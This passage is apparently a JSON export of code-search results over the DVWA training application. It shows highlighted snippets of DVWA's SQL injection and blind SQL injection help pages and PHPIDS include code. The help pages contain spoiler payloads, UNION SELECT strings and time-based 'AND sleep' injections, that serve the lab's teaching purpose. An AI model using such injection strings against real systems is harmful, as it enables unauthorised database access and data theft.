keyword\">to</span><span class=\"token operator\">-</span><span class=\"token keyword\">do</span> is escape the query <span class=\"token operator\">and</span> <span class=\"token keyword\">then</span> they are able</span>\n<span class=\"line-number\">26:</span> \t\t\t<span class=\"token keyword\">to</span> execute any SQL query they wish<span class=\"token punctuation\">.</span><span class=\"token operator\"><</span><span class=\"token operator\">/</span>p<span class=\"token operator\">></span>\n<span class=\"line-number\">27:</span> \t\t<span class=\"token operator\"><</span>pre<span class=\"token operator\">></span>Spoiler<span class=\"token punctuation\">:</span> <span class=\"token operator\"><</span>span class<span class=\"token operator\">=</span><span class=\"token string\">\"spoiler\"</span><span class=\"token operator\">></span><span class=\"token operator\">?</span>id<span class=\"token operator\">=</span>a' UNION <span class=\"token keyword\">SELECT</span> <span class=\"token string\">\"text1\"</span><span class=\"token punctuation\">,</span><span class=\"token string\">\"text2\"</span><span class=\"token comment\" spellcheck=\"true\">;-- -&Submit=Submit</span>.</pre></span>\n<span class=\"line-number\">28:</span> \n<span class=\"line-number\">29:</span> \t\t<span class=\"token operator\"><</span>br <span class=\"token operator\">/</span><span class=\"token operator\">></span>\n<span class=\"line-number\">30:</span> ",
"line": 25,
"start": 20,
"end": 31,
"severity": "unknown",
"note": ""
},
{
"id": 230,
"file": "/home/chris/src/DVWA-master/vulnerabilities/sqli/help/help.php",
"filetype": "php",
"search": "\\squery",
"match": "<span class=\"line-number\">21:</span> \n<span class=\"line-number\">22:</span> \t\t<span class=\"token operator\"><</span>br <span class=\"token operator\">/</span><span class=\"token operator\">></span><span class=\"token operator\"><</span>hr <span class=\"token operator\">/</span><span class=\"token operator\">></span><span class=\"token operator\"><</span>br <span class=\"token operator\">/</span><span class=\"token operator\">></span>\n<span class=\"line-number\">23:</span> \n<span class=\"line-number\">24:</span> \t\t<span class=\"token operator\"><</span>h3<span class=\"token operator\">></span>Low Level<span class=\"token operator\"><</span><span class=\"token operator\">/</span>h3<span class=\"token operator\">></span>\n<span class=\"line-number\">25:</span> \t\t<span class=\"token operator\"><</span>p<span class=\"token operator\">></span>The SQL query uses RAW input that is directly controlled by the attacker<span class=\"token punctuation\">.</span> All they need <span class=\"token keyword\">to</span><span class=\"token operator\">-</span><span class=\"token keyword\">do</span> is escape the query <span class=\"token operator\">and</span> <span class=\"token keyword\">then</span> they are able\n<span class=\"highlight\"><span class=\"line-number\">26:</span> \t\t\t<span class=\"token keyword\">to</span> execute any SQL query they wish<span class=\"token punctuation\">.</span><span class=\"token operator\"><</span><span class=\"token operator\">/</span>p<span class=\"token operator\">></span></span>\n<span class=\"line-number\">27:</span> \t\t<span class=\"token operator\"><</span>pre<span class=\"token operator\">></span>Spoiler<span class=\"token punctuation\">:</span> <span class=\"token operator\"><</span>span class<span class=\"token operator\">=</span><span class=\"token string\">\"spoiler\"</span><span class=\"token operator\">></span><span class=\"token operator\">?</span>id<span class=\"token operator\">=</span>a' UNION <span class=\"token keyword\">SELECT</span> <span class=\"token string\">\"text1\"</span><span class=\"token punctuation\">,</span><span class=\"token string\">\"text2\"</span><span class=\"token comment\" spellcheck=\"true\">;-- -&Submit=Submit</span>.</pre></span>\n<span class=\"line-number\">28:</span> \n<span class=\"line-number\">29:</span> \t\t<span class=\"token operator\"><</span>br <span class=\"token operator\">/</span><span class=\"token operator\">></span>\n<span class=\"line-number\">30:</span> \n<span class=\"line-number\">31:</span> \t\t<span class=\"token operator\"><</span>h3<span class=\"token operator\">></span>Medium Level<span class=\"token operator\"><</span><span class=\"token operator\">/</span>h3<span class=\"token operator\">></span>",
"line": 26,
"start": 21,
"end": 32,
"severity": "unknown",
"note": ""
},
{
"id": 231,
"file": "/home/chris/src/DVWA-master/vulnerabilities/sqli/help/help.php",
"filetype": "php",
"search": "\\squery",
"match": "<span class=\"line-number\">29:</span> \t\t<span class=\"token operator\"><</span>br <span class=\"token operator\">/</span><span class=\"token operator\">></span>\n<span class=\"line-number\">30:</span> \n<span class=\"line-number\">31:</span> \t\t<span class=\"token operator\"><</span>h3<span class=\"token operator\">></span>Medium Level<span class=\"token operator\"><</span><span class=\"token operator\">/</span>h3<span class=\"token operator\">></span>\n<span class=\"line-number\">32:</span> \t\t<span class=\"token operator\"><</span>p<span class=\"token operator\">></span>The medium level uses a form of SQL injection protection<span class=\"token punctuation\">,</span> <span class=\"token keyword\">with</span> the function of\n<span class=\"line-number\">33:</span> \t\t\t\"<span class=\"token operator\"><</span><span class=\"token operator\">?</span>php echo <span class=\"token function\">dvwaExternalLinkUrlGet</span><span class=\"token punctuation\">(</span> <span class=\"token string\">'https://secure.php.net/manual/en/function.mysql-real-escape-string.php'</span><span class=\"token punctuation\">,</span> <span class=\"token string\">'mysql_real_escape_string()'</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">; ?>\".</span>\n<span class=\"highlight\"><span class=\"line-number\">34:</span> \t\t\tHowever due <span class=\"token keyword\">to</span> the SQL query <span class=\"token operator\">not</span> having quotes around the parameter<span class=\"token punctuation\">,</span> this will <span class=\"token operator\">not</span> fully protect the query from being altered<span class=\"token punctuation\">.</span><span class=\"token operator\"><</span><span class=\"token operator\">/</span>p<span class=\"token operator\">></span></span>\n<span class=\"line-number\">35:</span> \n<span class=\"line-number\">36:</span> \t\t<span class=\"token operator\"><</span>p<span class=\"token operator\">></span>The text box has been replaced <span class=\"token keyword\">with</span> a pre<span class=\"token operator\">-</span>defined dropdown list <span class=\"token operator\">and</span> uses POST <span class=\"token keyword\">to</span> submit the form<span class=\"token punctuation\">.</span><span class=\"token operator\"><</span><span class=\"token operator\">/</span>p<span class=\"token operator\">></span>\n<span class=\"line-number\">37:</span> \t\t<span class=\"token operator\"><</span>pre<span class=\"token operator\">></span>Spoiler<span class=\"token punctuation\">:</span> <span class=\"token operator\"><</span>span class<span class=\"token operator\">=</span><span class=\"token string\">\"spoiler\"</span><span class=\"token operator\">></span><span class=\"token operator\">?</span>id<span class=\"token operator\">=</span>a UNION <span class=\"token keyword\">SELECT</span> <span class=\"token number\">1</span><span class=\"token punctuation\">,</span><span class=\"token number\">2</span><span class=\"token comment\" spellcheck=\"true\">;-- -&Submit=Submit</span>.</pre></span>\n<span class=\"line-number\">38:</span> \n<span class=\"line-number\">39:</span> \t\t<span class=\"token operator\"><</span>br <span class=\"token operator\">/</span><span class=\"token operator\">></span>",
"line": 34,
"start": 29,
"end": 40,
"severity": "unknown",
"note": ""
},
{
"id": 232,
"file": "/home/chris/src/DVWA-master/vulnerabilities/sqli/help/help.php",
"filetype": "php",
"search": "\\squery",
"match": "<span class=\"line-number\">38:</span> \n<span class=\"line-number\">39:</span> \t\t<span class=\"token operator\"><</span>br <span class=\"token operator\">/</span><span class=\"token operator\">></span>\n<span class=\"line-number\">40:</span> \n<span class=\"line-number\">41:</span> \t\t<span class=\"token operator\"><</span>h3<span class=\"token operator\">></span>High Level<span class=\"token operator\"><</span><span class=\"token operator\">/</span>h3<span class=\"token operator\">></span>\n<span class=\"line-number\">42:</span> \t\t<span class=\"token operator\"><</span>p<span class=\"token operator\">></span>This is very similar <span class=\"token keyword\">to</span> the low level<span class=\"token punctuation\">,</span> however this time the attacker is inputting the value <span class=\"token keyword\">in</span> a different manner<span class=\"token punctuation\">.</span>\n<span class=\"highlight\"><span class=\"line-number\">43:</span> \t\t\tThe input values are being transferred <span class=\"token keyword\">to</span> the vulnerable query via session variables using another page<span class=\"token punctuation\">,</span> rather than a direct GET request<span class=\"token punctuation\">.</span><span class=\"token operator\"><</span><span class=\"token operator\">/</span>p<span class=\"token operator\">></span></span>\n<span class=\"line-number\">44:</span> \t\t<span class=\"token operator\"><</span>pre<span class=\"token operator\">></span>Spoiler<span class=\"token punctuation\">:</span> <span class=\"token operator\"><</span>span class<span class=\"token operator\">=</span><span class=\"token string\">\"spoiler\"</span><span class=\"token operator\">></span>ID<span class=\"token punctuation\">:</span> a' UNION <span class=\"token keyword\">SELECT</span> <span class=\"token string\">\"text1\"</span><span class=\"token punctuation\">,</span><span class=\"token string\">\"text2\"</span><span class=\"token comment\" spellcheck=\"true\">;-- -&Submit=Submit</span>.</pre></span>\n<span class=\"line-number\">45:</span> \n<span class=\"line-number\">46:</span> \t\t<span class=\"token operator\"><</span>br <span class=\"token operator\">/</span><span class=\"token operator\">></span>\n<span class=\"line-number\">47:</span> \n<span class=\"line-number\">48:</span> \t\t<span class=\"token operator\"><</span>h3<span class=\"token operator\">></span>Impossible Level<span class=\"token operator\"><</span><span class=\"token operator\">/</span>h3<span class=\"token operator\">></span>",
"line": 43,
"start": 38,
"end": 49,
"severity": "unknown",
"note": ""
},
{
"id": 233,
"file": "/home/chris/src/DVWA-master/vulnerabilities/sqli/help/help.php",
"filetype": "php",
"search": "\\squery",
"match": "<span class=\"line-number\">44:</span> \t\t<span class=\"token operator\"><</span>pre<span class=\"token operator\">></span>Spoiler<span class=\"token punctuation\">:</span> <span class=\"token operator\"><</span>span class<span class=\"token operator\">=</span><span class=\"token string\">\"spoiler\"</span><span class=\"token operator\">></span>ID<span class=\"token punctuation\">:</span> a' UNION <span class=\"token keyword\">SELECT</span> <span class=\"token string\">\"text1\"</span><span class=\"token punctuation\">,</span><span class=\"token string\">\"text2\"</span><span class=\"token comment\" spellcheck=\"true\">;-- -&Submit=Submit</span>.</pre></span>\n<span class=\"line-number\">45:</span> \n<span class=\"line-number\">46:</span> \t\t<span class=\"token operator\"><</span>br <span class=\"token operator\">/</span><span class=\"token operator\">></span>\n<span class=\"line-number\">47:</span> \n<span class=\"line-number\">48:</span> \t\t<span class=\"token operator\"><</span>h3<span class=\"token operator\">></span>Impossible Level<span class=\"token operator\"><</span><span class=\"token operator\">/</span>h3<span class=\"token operator\">></span>\n<span class=\"highlight\"><span class=\"line-number\">49:</span> \t\t<span class=\"token operator\"><</span>p<span class=\"token operator\">></span>The queries are now parameterized queries <span class=\"token punctuation\">(</span>rather than being dynamic<span class=\"token punctuation\">)</span><span class=\"token punctuation\">.</span> This means the query has been defined by the developer<span class=\"token punctuation\">,</span></span>\n<span class=\"line-number\">50:</span> \t\t\t<span class=\"token operator\">and</span> has distinguish which sections are code<span class=\"token punctuation\">,</span> <span class=\"token operator\">and</span> the rest is data<span class=\"token punctuation\">.</span><span class=\"token operator\"><</span><span class=\"token operator\">/</span>p<span class=\"token operator\">></span>\n<span class=\"line-number\">51:</span> \t<span class=\"token operator\"><</span><span class=\"token operator\">/</span>div<span class=\"token operator\">></span><span class=\"token operator\"><</span><span class=\"token operator\">/</span>td<span class=\"token operator\">></span>\n<span class=\"line-number\">52:</span> \t<span class=\"token operator\"><</span><span class=\"token operator\">/</span>tr<span class=\"token operator\">></span>\n<span class=\"line-number\">53:</span> \t<span class=\"token operator\"><</span><span class=\"token operator\">/</span>table<span class=\"token operator\">></span>\n<span class=\"line-number\">54:</span> ",
"line": 49,
"start": 44,
"end": 55,
"severity": "unknown",
"note": ""
},
{
"id": 207,
"file": "/home/chris/src/DVWA-master/vulnerabilities/sqli_blind/help/help.php",
"filetype": "php",
"search": "\\squery",
"match": "<span class=\"line-number\">4:</span> \t<span class=\"token operator\"><</span>div id<span class=\"token operator\">=</span><span class=\"token string\">\"code\"</span><span class=\"token operator\">></span>\n<span class=\"line-number\">5:</span> \t<span class=\"token operator\"><</span>table width<span class=\"token operator\">=</span><span class=\"token string\">'100%'</span> bgcolor<span class=\"token operator\">=</span><span class=\"token string\">'white'</span> style<span class=\"token operator\">=</span><span class=\"token string\">\"border:2px #C0C0C0 solid\"</span><span class=\"token operator\">></span>\n<span class=\"line-number\">6:</span> \t<span class=\"token operator\"><</span>tr<span class=\"token operator\">></span>\n<span class=\"line-number\">7:</span> \t<span class=\"token operator\"><</span>td<span class=\"token operator\">></span><span class=\"token operator\"><</span>div id<span class=\"token operator\">=</span><span class=\"token string\">\"code\"</span><span class=\"token operator\">></span>\n<span class=\"line-number\">8:</span> \t\t<span class=\"token operator\"><</span>h3<span class=\"token operator\">></span>About<span class=\"token operator\"><</span><span class=\"token operator\">/</span>h3<span class=\"token operator\">></span>\n<span class=\"highlight\"><span class=\"line-number\">9:</span> \t\t<span class=\"token operator\"><</span>p<span class=\"token operator\">></span>When an attacker executes SQL injection attacks<span class=\"token punctuation\">,</span> sometimes the server responds <span class=\"token keyword\">with</span> error messages from the database server complaining that the SQL query's syntax is incorrect<span class=\"token punctuation\">.</span></span>\n<span class=\"line-number\">10:</span> \t\t\tBlind SQL injection is identical <span class=\"token keyword\">to</span> normal SQL Injection except that when an attacker attempts <span class=\"token keyword\">to</span> exploit an application<span class=\"token punctuation\">,</span> rather <span class=\"token keyword\">then</span> getting a useful error message<span class=\"token punctuation\">,</span>\n<span class=\"line-number\">11:</span> \t\t\tthey get a generic page specified by the developer instead<span class=\"token punctuation\">.</span> This makes exploiting a potential SQL Injection attack more difficult but <span class=\"token operator\">not</span> impossible<span class=\"token punctuation\">.</span>\n<span class=\"line-number\">12:</span> \t\t\tAn attacker can still steal data by asking a series of <span class=\"token boolean\">True</span> <span class=\"token operator\">and</span> <span class=\"token boolean\">False</span> questions through SQL statements<span class=\"token punctuation\">,</span> <span class=\"token operator\">and</span> monitoring how the web application response\n<span class=\"line-number\">13:</span> \t\t\t<span class=\"token punctuation\">(</span>valid entry retunred <span class=\"token operator\">or</span> <span class=\"token number\">404</span> header set<span class=\"token punctuation\">)</span><span class=\"token punctuation\">.</span><span class=\"token operator\"><</span><span class=\"token operator\">/</span>p<span class=\"token operator\">></span>\n<span class=\"line-number\">14:</span> ",
"line": 9,
"start": 4,
"end": 15,
"severity": "unknown",
"note": ""
},
{
"id": 208,
"file": "/home/chris/src/DVWA-master/vulnerabilities/sqli_blind/help/help.php",
"filetype": "php",
"search": "\\squery",
"match": "<span class=\"line-number\">11:</span> \t\t\tthey get a generic page specified by the developer instead<span class=\"token punctuation\">.</span> This makes exploiting a potential SQL Injection attack more difficult but <span class=\"token operator\">not</span> impossible<span class=\"token punctuation\">.</span>\n<span class=\"line-number\">12:</span> \t\t\tAn attacker can still steal data by asking a series of <span class=\"token boolean\">True</span> <span class=\"token operator\">and</span> <span class=\"token boolean\">False</span> questions through SQL statements<span class=\"token punctuation\">,</span> <span class=\"token operator\">and</span> monitoring how the web application response\n<span class=\"line-number\">13:</span> \t\t\t<span class=\"token punctuation\">(</span>valid entry retunred <span class=\"token operator\">or</span> <span class=\"token number\">404</span> header set<span class=\"token punctuation\">)</span><span class=\"token punctuation\">.</span><span class=\"token operator\"><</span><span class=\"token operator\">/</span>p<span class=\"token operator\">></span>\n<span class=\"line-number\">14:</span> \n<span class=\"line-number\">15:</span> \t\t<span class=\"token operator\"><</span>p<span class=\"token operator\">></span><span class=\"token string\">\"time based\"</span> injection method is often used when there is no visible feedback <span class=\"token keyword\">in</span> how the page different <span class=\"token keyword\">in</span> its response <span class=\"token punctuation\">(</span>hence its a blind attack<span class=\"token punctuation\">)</span><span class=\"token punctuation\">.</span>\n<span class=\"highlight\"><span class=\"line-number\">16:</span> \t\t \tThis means the attacker will wait <span class=\"token keyword\">to</span> see how long the page takes <span class=\"token keyword\">to</span> response back<span class=\"token punctuation\">.</span> <span class=\"token keyword\">If</span> it takes longer than normal<span class=\"token punctuation\">,</span> their query was successful<span class=\"token punctuation\">.</span><span class=\"token operator\"><</span><span class=\"token operator\">/</span>p<span class=\"token operator\">></span></span>\n<span class=\"line-number\">17:</span> \n<span class=\"line-number\">18:</span> \t\t<span class=\"token operator\"><</span>br <span class=\"token operator\">/</span><span class=\"token operator\">></span><span class=\"token operator\"><</span>hr <span class=\"token operator\">/</span><span class=\"token operator\">></span><span class=\"token operator\"><</span>br <span class=\"token operator\">/</span><span class=\"token operator\">></span>\n<span class=\"line-number\">19:</span> \n<span class=\"line-number\">20:</span> \t\t<span class=\"token operator\"><</span>h3<span class=\"token operator\">></span>Objective<span class=\"token operator\"><</span><span class=\"token operator\">/</span>h3<span class=\"token operator\">></span>\n<span class=\"line-number\">21:</span> \t\t<span class=\"token operator\"><</span>p<span class=\"token operator\">></span>Find the version of the SQL database software through a blind SQL attack<span class=\"token punctuation\">.</span><span class=\"token operator\"><</span><span class=\"token operator\">/</span>p<span class=\"token operator\">></span>",
"line": 16,
"start": 11,
"end": 22,
"severity": "unknown",
"note": ""
},
{
"id": 209,
"file": "/home/chris/src/DVWA-master/vulnerabilities/sqli_blind/help/help.php",
"filetype": "php",
"search": "\\squery",
"match": "<span class=\"line-number\">21:</span> \t\t<span class=\"token operator\"><</span>p<span class=\"token operator\">></span>Find the version of the SQL database software through a blind SQL attack<span class=\"token punctuation\">.</span><span class=\"token operator\"><</span><span class=\"token operator\">/</span>p<span class=\"token operator\">></span>\n<span class=\"line-number\">22:</span> \n<span class=\"line-number\">23:</span> \t\t<span class=\"token operator\"><</span>br <span class=\"token operator\">/</span><span class=\"token operator\">></span><span class=\"token operator\"><</span>hr <span class=\"token operator\">/</span><span class=\"token operator\">></span><span class=\"token operator\"><</span>br <span class=\"token operator\">/</span><span class=\"token operator\">></span>\n<span class=\"line-number\">24:</span> \n<span class=\"line-number\">25:</span> \t\t<span class=\"token operator\"><</span>h3<span class=\"token operator\">></span>Low Level<span class=\"token operator\"><</span><span class=\"token operator\">/</span>h3<span class=\"token operator\">></span>\n<span class=\"highlight\"><span class=\"line-number\">26:</span> \t\t<span class=\"token operator\"><</span>p<span class=\"token operator\">></span>The SQL query uses RAW input that is directly controlled by the attacker<span class=\"token punctuation\">.</span> All they need <span class=\"token keyword\">to</span><span class=\"token operator\">-</span><span class=\"token keyword\">do</span> is escape the query <span class=\"token operator\">and</span> <span class=\"token keyword\">then</span> they are able</span>\n<span class=\"line-number\">27:</span> \t\t\t<span class=\"token keyword\">to</span> execute any SQL query they wish<span class=\"token punctuation\">.</span><span class=\"token operator\"><</span><span class=\"token operator\">/</span>p<span class=\"token operator\">></span>\n<span class=\"line-number\">28:</span> \t\t<span class=\"token operator\"><</span>pre<span class=\"token operator\">></span>Spoiler<span class=\"token punctuation\">:</span> <span class=\"token operator\"><</span>span class<span class=\"token operator\">=</span><span class=\"token string\">\"spoiler\"</span><span class=\"token operator\">></span><span class=\"token operator\">?</span>id<span class=\"token operator\">=</span><span class=\"token number\">1</span>' <span class=\"token operator\">AND</span> sleep <span class=\"token number\">5</span><span class=\"token operator\">&</span>Submit<span class=\"token operator\">=</span>Submit<span class=\"token operator\"><</span><span class=\"token operator\">/</span>span<span class=\"token operator\">></span><span class=\"token punctuation\">.</span><span class=\"token operator\"><</span><span class=\"token operator\">/</span>pre<span class=\"token operator\">></span>\n<span class=\"line-number\">29:</span> \n<span class=\"line-number\">30:</span> \t\t<span class=\"token operator\"><</span>br <span class=\"token operator\">/</span><span class=\"token operator\">></span>\n<span class=\"line-number\">31:</span> ",
"line": 26,
"start": 21,
"end": 32,
"severity": "unknown",
"note": ""
},
{
"id": 210,
"file": "/home/chris/src/DVWA-master/vulnerabilities/sqli_blind/help/help.php",
"filetype": "php",
"search": "\\squery",
"match": "<span class=\"line-number\">22:</span> \n<span class=\"line-number\">23:</span> \t\t<span class=\"token operator\"><</span>br <span class=\"token operator\">/</span><span class=\"token operator\">></span><span class=\"token operator\"><</span>hr <span class=\"token operator\">/</span><span class=\"token operator\">></span><span class=\"token operator\"><</span>br <span class=\"token operator\">/</span><span class=\"token operator\">></span>\n<span class=\"line-number\">24:</span> \n<span class=\"line-number\">25:</span> \t\t<span class=\"token operator\"><</span>h3<span class=\"token operator\">></span>Low Level<span class=\"token operator\"><</span><span class=\"token operator\">/</span>h3<span class=\"token operator\">></span>\n<span class=\"line-number\">26:</span> \t\t<span class=\"token operator\"><</span>p<span class=\"token operator\">></span>The SQL query uses RAW input that is directly controlled by the attacker<span class=\"token punctuation\">.</span> All they need <span class=\"token keyword\">to</span><span class=\"token operator\">-</span><span class=\"token keyword\">do</span> is escape the query <span class=\"token operator\">and</span> <span class=\"token keyword\">then</span> they are able\n<span class=\"highlight\"><span class=\"line-number\">27:</span> \t\t\t<span class=\"token keyword\">to</span> execute any SQL query they wish<span class=\"token punctuation\">.</span><span class=\"token operator\"><</span><span class=\"token operator\">/</span>p<span class=\"token operator\">></span></span>\n<span class=\"line-number\">28:</span> \t\t<span class=\"token operator\"><</span>pre<span class=\"token operator\">></span>Spoiler<span class=\"token punctuation\">:</span> <span class=\"token operator\"><</span>span class<span class=\"token operator\">=</span><span class=\"token string\">\"spoiler\"</span><span class=\"token operator\">></span><span class=\"token operator\">?</span>id<span class=\"token operator\">=</span><span class=\"token number\">1</span>' <span class=\"token operator\">AND</span> sleep <span class=\"token number\">5</span><span class=\"token operator\">&</span>Submit<span class=\"token operator\">=</span>Submit<span class=\"token operator\"><</span><span class=\"token operator\">/</span>span<span class=\"token operator\">></span><span class=\"token punctuation\">.</span><span class=\"token operator\"><</span><span class=\"token operator\">/</span>pre<span class=\"token operator\">></span>\n<span class=\"line-number\">29:</span> \n<span class=\"line-number\">30:</span> \t\t<span class=\"token operator\"><</span>br <span class=\"token operator\">/</span><span class=\"token operator\">></span>\n<span class=\"line-number\">31:</span> \n<span class=\"line-number\">32:</span> \t\t<span class=\"token operator\"><</span>h3<span class=\"token operator\">></span>Medium Level<span class=\"token operator\"><</span><span class=\"token operator\">/</span>h3<span class=\"token operator\">></span>",
"line": 27,
"start": 22,
"end": 33,
"severity": "unknown",
"note": ""
},
{
"id": 211,
"file": "/home/chris/src/DVWA-master/vulnerabilities/sqli_blind/help/help.php",
"filetype": "php",
"search": "\\squery",
"match": "<span class=\"line-number\">30:</span> \t\t<span class=\"token operator\"><</span>br <span class=\"token operator\">/</span><span class=\"token operator\">></span>\n<span class=\"line-number\">31:</span> \n<span class=\"line-number\">32:</span> \t\t<span class=\"token operator\"><</span>h3<span class=\"token operator\">></span>Medium Level<span class=\"token operator\"><</span><span class=\"token operator\">/</span>h3<span class=\"token operator\">></span>\n<span class=\"line-number\">33:</span> \t\t<span class=\"token operator\"><</span>p<span class=\"token operator\">></span>The medium level uses a form of SQL injection protection<span class=\"token punctuation\">,</span> <span class=\"token keyword\">with</span> the function of\n<span class=\"line-number\">34:</span> \t\t\t\"<span class=\"token operator\"><</span><span class=\"token operator\">?</span>php echo <span class=\"token function\">dvwaExternalLinkUrlGet</span><span class=\"token punctuation\">(</span> <span class=\"token string\">'https://secure.php.net/manual/en/function.mysql-real-escape-string.php'</span><span class=\"token punctuation\">,</span> <span class=\"token string\">'mysql_real_escape_string()'</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">; ?>\".</span>\n<span class=\"highlight\"><span class=\"line-number\">35:</span> \t\t\tHowever due <span class=\"token keyword\">to</span> the SQL query <span class=\"token operator\">not</span> having quotes around the parameter<span class=\"token punctuation\">,</span> this will <span class=\"token operator\">not</span> fully protect the query from being altered<span class=\"token punctuation\">.</span><span class=\"token operator\"><</span><span class=\"token operator\">/</span>p<span class=\"token operator\">></span></span>\n<span class=\"line-number\">36:</span> \n<span class=\"line-number\">37:</span> \t\t<span class=\"token operator\"><</span>p<span class=\"token operator\">></span>The text box has been replaced <span class=\"token keyword\">with</span> a pre<span class=\"token operator\">-</span>defined dropdown list <span class=\"token operator\">and</span> uses POST <span class=\"token keyword\">to</span> submit the form<span class=\"token punctuation\">.</span><span class=\"token operator\"><</span><span class=\"token operator\">/</span>p<span class=\"token operator\">></span>\n<span class=\"line-number\">38:</span> \t\t<span class=\"token operator\"><</span>pre<span class=\"token operator\">></span>Spoiler<span class=\"token punctuation\">:</span> <span class=\"token operator\"><</span>span class<span class=\"token operator\">=</span><span class=\"token string\">\"spoiler\"</span><span class=\"token operator\">></span><span class=\"token operator\">?</span>id<span class=\"token operator\">=</span><span class=\"token number\">1</span> <span class=\"token operator\">AND</span> sleep <span class=\"token number\">3</span><span class=\"token operator\">&</span>Submit<span class=\"token operator\">=</span>Submit<span class=\"token operator\"><</span><span class=\"token operator\">/</span>span<span class=\"token operator\">></span><span class=\"token punctuation\">.</span><span class=\"token operator\"><</span><span class=\"token operator\">/</span>pre<span class=\"token operator\">></span>\n<span class=\"line-number\">39:</span> \n<span class=\"line-number\">40:</span> \t\t<span class=\"token operator\"><</span>br <span class=\"token operator\">/</span><span class=\"token operator\">></span>",
"line": 35,
"start": 30,
"end": 41,
"severity": "unknown",
"note": ""
},
{
"id": 212,
"file": "/home/chris/src/DVWA-master/vulnerabilities/sqli_blind/help/help.php",
"filetype": "php",
"search": "\\squery",
"match": "<span class=\"line-number\">46:</span> \t\t\tSpoiler<span class=\"token punctuation\">:</span> <span class=\"token operator\"><</span>span class<span class=\"token operator\">=</span><span class=\"token string\">\"spoiler\"</span><span class=\"token operator\">></span>Should be able <span class=\"token keyword\">to</span> cut out the middle man<span class=\"token punctuation\">.</span><span class=\"token operator\"><</span><span class=\"token operator\">/</span>span<span class=\"token operator\">></span><span class=\"token punctuation\">.</span><span class=\"token operator\"><</span><span class=\"token operator\">/</span>pre<span class=\"token operator\">></span>\n<span class=\"line-number\">47:</span> \n<span class=\"line-number\">48:</span> \t\t<span class=\"token operator\"><</span>br <span class=\"token operator\">/</span><span class=\"token operator\">></span>\n<span class=\"line-number\">49:</span> \n<span class=\"line-number\">50:</span> \t\t<span class=\"token operator\"><</span>h3<span class=\"token operator\">></span>Impossible Level<span class=\"token operator\"><</span><span class=\"token operator\">/</span>h3<span class=\"token operator\">></span>\n<span class=\"highlight\"><span class=\"line-number\">51:</span> \t\t<span class=\"token operator\"><</span>p<span class=\"token operator\">></span>The queries are now parameterized queries <span class=\"token punctuation\">(</span>rather than being dynamic<span class=\"token punctuation\">)</span><span class=\"token punctuation\">.</span> This means the query has been defined by the developer<span class=\"token punctuation\">,</span></span>\n<span class=\"line-number\">52:</span> \t\t\t<span class=\"token operator\">and</span> has distinguish which sections are code<span class=\"token punctuation\">,</span> <span class=\"token operator\">and</span> the rest is data<span class=\"token punctuation\">.</span><span class=\"token operator\"><</span><span class=\"token operator\">/</span>p<span class=\"token operator\">></span>\n<span class=\"line-number\">53:</span> \t<span class=\"token operator\"><</span><span class=\"token operator\">/</span>div<span class=\"token operator\">></span><span class=\"token operator\"><</span><span class=\"token operator\">/</span>td<span class=\"token operator\">></span>\n<span class=\"line-number\">54:</span> \t<span class=\"token operator\"><</span><span class=\"token operator\">/</span>tr<span class=\"token operator\">></span>\n<span class=\"line-number\">55:</span> \t<span class=\"token operator\"><</span><span class=\"token operator\">/</span>table<span class=\"token operator\">></span>\n<span class=\"line-number\">56:</span> ",
"line": 51,
"start": 46,
"end": 57,
"severity": "unknown",
"note": ""
},
{
"id": 35,
"file": "/home/chris/src/DVWA-master/dvwa/includes/dvwaPhpIds.inc.php",
"filetype": "php",
"search": "\\srequire",
"match": "<span class=\"line-number\">74:</span> \t\t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> <span class=\"token number\">2</span><span class=\"token punctuation\">.</span> Initiate the PHPIDS <span class=\"token operator\">and</span> fetch the results\n<span class=\"line-number\">75:</span> \t\t<span class=\"token variable\">$ids</span> <span class=\"token operator\">=</span> new <span class=\"token function\">IDS_Monitor</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$request</span><span class=\"token punctuation\">,</span> <span class=\"token variable\">$init</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">76:</span> \t\t<span class=\"token variable\">$result</span> <span class=\"token operator\">=</span> <span class=\"token variable\">$ids</span><span class=\"token operator\">-</span><span class=\"token operator\">></span><span class=\"token function\">run</span><span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">77:</span> \n<span class=\"line-number\">78:</span> \t\t<span class=\"token function\">if</span><span class=\"token punctuation\">(</span> !<span class=\"token variable\">$result</span><span class=\"token operator\">-</span><span class=\"token operator\">></span><span class=\"token function\">isEmpty</span><span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span> <span class=\"token punctuation\">)</span> {\n<span class=\"highlight\"><span class=\"line-number\">79:</span> \t\t\trequire_once <span class=\"token string\">'IDS/Log/File.php'</span><span class=\"token comment\" spellcheck=\"true\">;</span></span>\n<span class=\"line-number\">80:</span> \t\t\trequire_once <span class=\"token string\">'IDS/Log/Composite.php'</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">81:</span> \n<span class=\"line-number\">82:</span> \t\t\t<span class=\"token variable\">$compositeLog</span> <span class=\"token operator\">=</span> new <span class=\"token function\">IDS_Log_Composite</span><span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">83:</span> \t\t\t<span class=\"token variable\">$compositeLog</span><span class=\"token operator\">-</span><span class=\"token operator\">></span><span class=\"token function\">addLogger</span><span class=\"token punctuation\">(</span>IDS_Log_File<span class=\"token punctuation\">:</span><span class=\"token punctuation\">:</span><span class=\"token function\">getInstance</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$init</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">84:</span> ",
"line": 79,
"start": 74,
"end": 85,
"severity": "unknown",
"note": ""
},
{
"id": 36,
"file": "/home/chris/src/DVWA-master/dvwa/includes/dvwaPhpIds.inc.php",
"filetype": "php",
"search": "\\srequire",
